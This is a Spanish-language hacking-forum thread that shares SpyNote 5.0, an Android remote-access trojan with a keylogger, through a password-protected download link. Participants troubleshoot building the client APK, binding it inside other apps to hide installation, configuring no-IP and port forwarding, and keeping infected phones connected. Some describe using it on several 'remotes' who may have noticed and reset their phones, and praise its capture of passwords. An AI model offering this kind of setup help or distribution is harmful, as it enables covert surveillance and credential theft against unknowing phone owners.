Hola buenas a tod@s:
Quiero compartirles este troyano. Lo encontré en otro foro la verdad me llamo la atención por el tema que tiene Keylogger
(http://img.fenixzone.net/i/bicvdPJ.png)
(http://img.fenixzone.net/i/ANnLT1Z.png)
(http://img.fenixzone.net/i/YLjwRcu.png)
(http://img.fenixzone.net/i/NnObteP.png)
Analícenlo antes de usarlo por si las moscas...
http://www49.zippyshare.com/v/sgdI6DUs/file.html
Pass: 123456
Tengo una duda, trato de hacer marge con otra apk y al generarme el client.apk primero me instala lo que pienso vendria siendo el control y despues me instala el apk con la que se supone esta escondida, eso es normal?
y ya instalado no logra conectarse
Por si te sirve de ayuda hice un vídeo tutorial de este troyano
En todos los troyanos Android la opción binder siempre pasa eso que primero instala el troyano y luego instala la aplicación, juego o lo que sea. Algo inútil la opción binder
Para mí la versión más estable de Spy note es la versión Spy Note 2.4.1
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Por si te sirve de ayuda hice un vídeo tutorial de este troyano
En todos los troyanos Android la opción binder siempre pasa eso que primero instala el troyano y luego instala la aplicación, juego o lo que sea. Algo inútil la opción binder
Para mí la versión más estable de Spy note es la versión Spy Note 2.4.1
se supone el binder oculta esa instalacion pareciendo solo instalas un juego o algo similar y aquie s diferente primero instala el troyano y despues lo ejecutas para instalar la aplicacion con la que supuestamente se usa el binder
Que tan seguro es descargarlo , de aqui? Es que lo decargo y me marca alerta acada rato mi antivirus
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que tan seguro es descargarlo , de aqui? Es que lo decargo y me marca alerta acada rato mi antivirus
Es normal, el antivirus te lo marca porque estas descargandote un troyano
Atr0m
Así es... Los antivirus detectan a los troyanos como troyanos.. Es normal no?
Saludos,
ANTRAX
bueno yo lo llevo usando hace días, cuando salio estaba FUD, ahora el windows defender ya lo detecto, así que debe ser porque ciertas personas lo pasan por virus total.. etc.. y la parte del keylogger si funciona :) , incluso con los teclados virtuales donde ponen las claves de código, también lo detecta.
No conocía este RAT, es interesante le echaré un vistazo, sobre todo por la parte del keylogger.
Gracias @comandosoft (https://underc0de.org/foro/index.php?action=profile;u=10355) por traerlo :D
Un saludo.
Gracias por el aporte, lo he probado con 4 remotos diferentes, al principio todo bien, ahora me desaparecieron 3 y el único que me queda a veces conecta y a veces no. Me voy a la opción de logs y se ven los intentos fallidos de conexión, mencionando el error "Se ha forzado la interrupción de una conexión existente por el host remoto (56)".
¿Alguien tiene idea de lo que podría estar sucediendo?
¿Será que se dieron cuenta los otros 3 remotos y restablecieron sus androids?
Espero y puedan apoyarme.... saludos
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias por el aporte, lo he probado con 4 remotos diferentes, al principio todo bien, ahora me desaparecieron 3 y el único que me queda a veces conecta y a veces no. Me voy a la opción de logs y se ven los intentos fallidos de conexión, mencionando el error "Se ha forzado la interrupción de una conexión existente por el host remoto (56)".
¿Alguien tiene idea de lo que podría estar sucediendo?
¿Será que se dieron cuenta los otros 3 remotos y restablecieron sus androids?
Espero y puedan apoyarme.... saludos
Pueden ser varias cosas, desde que no tengan conexión a internet en el momento en que tu conectas el panel a que se hayan perdido. para comprobarlo deja el panel abierto un par de días y revisa el log a ver si en algún momento han conectado.
Estuve haciendo pruebas y me fue genial! ¡Me encanto!
Pero no conseguí hacer andar el keylogger. solo me da error todo el rato.
Como idea, Seria interesante que te permitiera instalarle aplicaciones remotamente ;D
EDIT:
¿Alguien sabría como hacer una captura de pantalla?
tengo una duda,cuando trato de buil un server con o sin apk para ajuntar se tarda mucho. Alguien mas ha pasado por eso?
Buenas, tengo una duda, cuando trato de crear el apk, me aparece este error:
Microsoft Windows [Versi¢n 6.1.7601]
"java" no se reconoce como un comando interno o externo,
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
programa o archivo por lotes ejecutable.
C:\Users\****\Downloads\SpyNote5.0>java -version
alguno tiene idea de porque o la solucion?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Buenas, tengo una duda, cuando trato de crear el apk, me aparece este error:
Microsoft Windows [Versi¢n 6.1.7601]
"java" no se reconoce como un comando interno o externo,
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
programa o archivo por lotes ejecutable.
C:\Users\****\Downloads\SpyNote5.0>java -version
alguno tiene idea de porque o la solucion?
Instala Java
https://www.java.com/es/download/
Muchisimas gracias ! Disculpen que moleste pero me surgió otro problema
Microsoft Windows [Versi¢n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Users\****\Downloads\SpyNote5.0>java -version
java version "1.8.0_161"
Java(TM) SE Runtime Environment (build 1.8.0_161-b12)
Java HotSpot(TM) Client VM (build 25.161-b12, mixed mode, sharing)
C:\Users\****\Downloads\SpyNote5.0>cd C:\Building\apktool
C:\Building\apktool>apktool d app-release.apk
I: Using Apktool 2.2.2 on app-release.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: C:\Users\****\AppData\Local\apktool\framework\1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
C:\Building\apktool>apktool b -f -r app-release
I: Using Apktool 2.2.2
I: Smaling smali folder into classes.dex...
I: Building resources...
W: C:\Building\apktool\app-release\AndroidManifest.xml: error: Unable to open file for read: Permission denied
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\****\AppData\Local\Temp\brut_util_Jar_8648192645053380914.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 22, --version-code, 1, --version-name, null, --no-version-vectors, -F, C:\Users\****\AppData\Local\Temp\APKTOOL1017699121716064467.tmp, -0, arsc, -0, apk, -0, arsc, -I, C:\Users\****\AppData\Local\apktool\framework\1.apk, -S, C:\Building\apktool\app-release\res, -M, C:\Building\apktool\app-release\AndroidManifest.xml]
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
at brut.androlib.Androlib.buildResources(Androlib.java:411)
at brut.androlib.Androlib.build(Androlib.java:310)
at brut.androlib.Androlib.build(Androlib.java:263)
at brut.apktool.Main.cmdBuild(Main.java:227)
at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\****\AppData\Local\Temp\brut_util_Jar_8648192645053380914.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 22, --version-code, 1, --version-name, null, --no-version-vectors, -F, C:\Users\****\AppData\Local\Temp\APKTOOL1017699121716064467.tmp, -0, arsc, -0, apk, -0, arsc, -I, C:\Users\****\AppData\Local\apktool\framework\1.apk, -S, C:\Building\apktool\app-release\res, -M, C:\Building\apktool\app-release\AndroidManifest.xml]
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\****\AppData\Local\Temp\brut_util_Jar_8648192645053380914.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 22, --version-code, 1, --version-name, null, --no-version-vectors, -F, C:\Users\****\AppData\Local\Temp\APKTOOL1017699121716064467.tmp, -0, arsc, -0, apk, -0, arsc, -I, C:\Users\****\AppData\Local\apktool\framework\1.apk, -S, C:\Building\apktool\app-release\res, -M, C:\Building\apktool\app-release\AndroidManifest.xml]
at brut.util.OS.exec(OS.java:95)
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)
... 6 more
C:\Building\apktool>java -jar SignApk.jar certificate.pem key.pk8 app-release\dist\app-release.apk out\client.apk
java.io.FileNotFoundException: app-release\dist\app-release.apk (El sistema no puede encontrar la ruta especificada)
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.<init>(Unknown Source)
at java.util.zip.ZipFile.<init>(Unknown Source)
at java.util.jar.JarFile.<init>(Unknown Source)
at java.util.jar.JarFile.<init>(Unknown Source)
at com.android.signapk.SignApk.main(SignApk.java:320)
Disculpen las molestias
Tendrás que establecer el Path de Java:
Windows 10 y Windows 8
- En Buscar, busque y seleccione: Sistema (Panel de control)
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
Windows 7
- Desde el escritorio, haga clic con el botón derecho del mouse en el icono de la computadora.
- Seleccione Propiedades en el menú contextual.
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
y cual es el valor de la variable de entorno PATH, es lo unico que no me quedo claro
El valor de la variable es la ruta dónde Java se ha instalado, lógicamente tienes que haberlo descargado previamente.
Un ejemplo:
(https://lh3.googleusercontent.com/8XkpVW2z-iE6tskhosMy7OyA0M5u-Qgr22qvTKJ89Bns0xNiUgxM0WKiGI0PVLl2iSKtNqkyjsmK-w3JVmh884Pw4_SzaYMm67T0YVrnhJ5LGXJQC8wnnxVDx2EA-YzZFEE5lCjiNpcNwWjHqzrYK1xfAogF0SebxS_0TghHbgIxf1GS7yLhlekFMe3L-3aYyxvXyvSYa5lNsjH-Xgu16qSYp4fK11jCkTDKg0Eeqedqbibaxq6X8I7SBZbif83A8su4F44-TSQEDttUz7l4CME_6GQdYHI5YOmsPQWoCeYLgfeaPKyd0_GS5oNK-qzZXfn8RUrxN7iU8Sd3TlofS_9a9pgChfli0ql5Iq-JZ1z9QfLVIXScKi5nBMSv6Ub5Xn1Y0DFaNr69HXvBxgOJWge0oBNExuJvJ4QUuDmvH4OXIZfa_SyqhMNslOvO_Mcu_34OOT81jWr9jYPjIslYDBlUMDiz1YhIeK0nkdrhvaTNYL0FxxVQhtWze5YASXA3xVQXapJKTWYhTgxdTCoZsn3O_NSvnHDSlR1R05mfovjt-q6dNyxw3Zkee8DMBGg6MtWRq0YivWoAnJvyC3L4u_n7wn16nIMuWIrBAKdaWnL8ahm_w-sA=w650-h261-no)
Buenas!
Ayer estuve probándolo, me gusta, tiene buena pinta, sólo hay algo que no me queda claro:
Cuando el cliente está ejecutándose en el móvil, todo bien, pero en el momento que fuerzo el cierre de la aplicación o por ejemplo reinicio el teléfono, no hay posibilidad de volver a iniciar el malware por sí mismo?
Gracias.
todo muy bien amigo ahora como firmo digitalmente la aplicacion :'(
Hola, es posible que me ayuden?
Cree una cuenta no-ip y he realizado los pasos como esta en el video, lo intente pero no me aparece el celular en el listado que puede ser?
Saludos,
No me funcionó. Cuando pulsé el botón build no hizo nada. No creo el apk.
No la crea por qué tienes java 10 y es 8 que nesesitas
Bueno nose pero nunca he logrado conectar un rat uso no IP , IP local intento de todas forma y nunca logro conectarlo nose que estoy asiendo mal
hola podrian decirme que emulador de android utilizar para hacer pruebas en misma computadora? , por ejemplo ingreso en el Spynote la IP de dns : 127.0.0.1 mi maquina local. Luego pongo a la escucha el Spynote en el puerto 3210, (tambien quisiera saber si es posible cambiar ese puerto por otro, o al cambiarlo no funciona). Llevo la client.apk creada con el builder al emulador de android la ejecuto pero en el servidor no aparece nada, es como si no se estableciera la conexion. He mirado con el netstat y tampoco veo conexiones.
En el videotutorial no aprecio a saber que emulador android utliza el compañero
Sino podéis conectar el RAT por NO-IP deberíais mirar de abrir puertos y redirigir el tráfico del router seguramente os faltara alguno de los pasos.
Buenas, el spy note 5 no me crea el apk, ni sale la barra verde cargando.
saben algo, he visto en sitios que le pasa a mucha gente,
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola buenas a tod@s:
Quiero compartirles este troyano. Lo encontré en otro foro la verdad me llamo la atención por el tema que tiene Keylogger
(http://img.fenixzone.net/i/bicvdPJ.png)
(http://img.fenixzone.net/i/ANnLT1Z.png)
(http://img.fenixzone.net/i/YLjwRcu.png)
(http://img.fenixzone.net/i/NnObteP.png)
Analícenlo antes de usarlo por si las moscas...
http://www49.zippyshare.com/v/sgdI6DUs/file.html
Pass: 123456
hola gente saben si aun esta activo soy nuevo en el tema , solo queria pedir algunas pautas alguien que domine bien el tema se los agradeceria
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Buenas, el spy note 5 no me crea el apk, ni sale la barra verde cargando.
saben algo, he visto en sitios que le pasa a mucha gente,
me pasa lo mismo cuando sigo los pasos del video ero cuando le doy build no carga la barra verde y ni cerrar el programa puedo puedo navegar por las ventans del mismo pero nada mas no me crea el archivo , podrian darme una mano
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Tendrás que establecer el Path de Java:
Windows 10 y Windows 8
- En Buscar, busque y seleccione: Sistema (Panel de control)
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
Windows 7
- Desde el escritorio, haga clic con el botón derecho del mouse en el icono de la computadora.
- Seleccione Propiedades en el menú contextual.
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
gracias me ayudo de maravilla tu post era lo que faltaba
Hola compañeros. Sabrían como bindearlo con otra apk ya que la función directa que trae este rat no me funciona correctamente. Pide muchos permisos para su instalación y no abre el apk incrustada. He probado con wh apk crypter sin exito. Conocen alguna otra forma. Muchas gracias de antemano por las respuestas
No tienes permitido ver los links.
Registrarse o Entrar a mi cuentaNo tienes permitido ver los links.
Registrarse o Entrar a mi cuentaTendrás que establecer el Path de Java:
Windows 10 y Windows 8
- En Buscar, busque y seleccione: Sistema (Panel de control)
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
Windows 7
- Desde el escritorio, haga clic con el botón derecho del mouse en el icono de la computadora.
- Seleccione Propiedades en el menú contextual.
- Haga clic en el enlace Configuración avanzada del sistema.
- Haga clic en Variables de entorno. En la sección Variables del sistema, busque la variable de entorno PATH y selecciónela.
- Haga clic en Editar. Si no existe la variable de entorno PATH, haga clic en Nuevo.
En la ventana Editar la variable del sistema (o Nueva variable del sistema), debe especificar el valor de la variable de entorno PATH. Haga clic en Aceptar. Cierre todas las demás ventanas haciendo clic en Aceptar.
- Vuelva a abrir la ventana del indicador de comandos y ejecute el código de java.
gracias me ayudo de maravilla tu post era lo que faltaba
Hola amigo! oye parece que al final lograste funcionar el spnynote?
Porque no logro crear al apk, y eso seguir los mismo pasos que dijo el colega del path, pero no crea aun. Tengo la version 5.0 del spynote y en java la versión 8.0
hols no puedo descargar spy note 5.0 me ayudan
No tienes permitido ver los links.
Registrarse o Entrar a mi cuentahols no puedo descargar spy note 5.0 me ayudan
Este post es del 2017. Se debe abrir una duda en Dudas y pedidos generales para ese propósito.
~ DtxdF